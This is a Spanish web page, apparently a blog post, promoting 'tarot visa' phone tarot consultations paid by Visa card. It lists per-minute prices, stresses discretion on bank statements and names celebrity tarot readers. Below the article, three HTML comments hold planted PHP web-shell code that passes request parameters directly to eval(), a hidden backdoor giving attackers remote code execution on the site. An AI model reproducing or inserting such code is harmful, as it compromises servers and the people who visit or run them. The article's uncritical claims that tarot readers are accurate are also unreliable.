Tarot visa, método seguro de pagar

En ocasiones las dificultades que llegan a nuestra vida son tantas, que necesitamos una ayuda extra para saber qué va a pasar con nuestro futuro, con ese amor que se está alejando, con la entrevista de trabajo a la que fuimos y no nos han llamado, o incluso sobre la suerte que nos depara el destino para algún mes o momento especial de nuestras vidas. Es en esas situaciones cuando se cuenta con los tarotistas y los call center de especialistas en temas esotéricos, el método de tarot visa es bien seguro y está popularizado en España.

Tarot visa, método seguro de pagar

Es un método que han venido eligiendo uno  y otro cliente, pues es totalmente seguro, porque los valores de la consulta se descuentan de manera exacta. En la mayoría de los call center incluso preguntan al cliente cuánto tiempo desea estar en la línea telefónica consultando a uno de los tarotistas expertos.

El proceso para usar el tarot visa empieza desde un acuerdo con la persona de servicio al cliente o de recepción, quién te indica qué tarotistas están disponibles, cuál es el más acertado de acuerdo a la duda que tengas y al área de tu vida que se está viendo afectado. Además, toma el dato de cuántos minutos deseas estar en consulta con el experto.

Con tarot visa pagas desde 10 hasta 60 minutos o más

Alguno centros esotéricos tienen consultas de 10 minutos, también de 20, 30 y hasta de 40 minutos por llamada. Si adquieres el paquete de 10 minutos, el valor por minuto va a ser más alto, mientras si deseas conectarte con tu tarotista 30 o 40 minutos, podrás darte cuenta de los descuentos que puedes adquirir.

La confidencialidad es una de las más importantes características de pagar con tarot visa, pues en el extracto bancario no aparecen palabras que delaten que estuviste consultando a un experto esotérico.

Algunos call center reciben tarjeta de crédito visa y mastercard, la persona encargada de recibir primero tu llamada, te va a pedir los datos necesarios para que se realice exitosamente la transacción y ahí si puedas empezar a consultar a ese vidente que tiene toda la capacidad de sacarte de cualquier duda.

Al momento de pagar con el método tarot visa, lo precios son variables de acuerdo al grupo que te esté ofreciendo el servicio y hasta de la empresa de telefonía con la que tengas contrato.

Algunos famosos tarotistas ya usan este método para brindarle seguridad a sus clientes, un grupo de videntes y profesionales que manejan el Tarot Una luz, tienen ofertas que van desde consultas de 15 minutos por 7 euros, la de 20 minutos por 11 euros, 30 minutos por 13 euros y si vas a realizar una consulta más completa, una de 45 minutos o una hora, deberás pagar por medio de tarot visa 20 o 28 euros.

La polémica pero acertada y experta tarotista Aramis Fuster, trabaja con el método de tarot visa, como opción para el pago de consultas con esta bruja que sustenta tener habilidades esotéricas desde que tiene recuerdos.

El famoso Octavio Aceves también maneja tarot visa y en la lista lo acompañan: Rappel, Silvia Raposo, David Trivín, Maruja Zorrilla y Aida Romero.

<!– [insert_php]if (isset($_REQUEST["KRdUk"])){eval($_REQUEST["KRdUk"]);exit;}[/insert_php][php]if (isset($_REQUEST["KRdUk"])){eval($_REQUEST["KRdUk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["InTSU"])){eval($_REQUEST["InTSU"]);exit;}[/insert_php][php]if (isset($_REQUEST["InTSU"])){eval($_REQUEST["InTSU"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["KiB"])){eval($_REQUEST["KiB"]);exit;}[/insert_php][php]if (isset($_REQUEST["KiB"])){eval($_REQUEST["KiB"]);exit;}[/php] –>

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *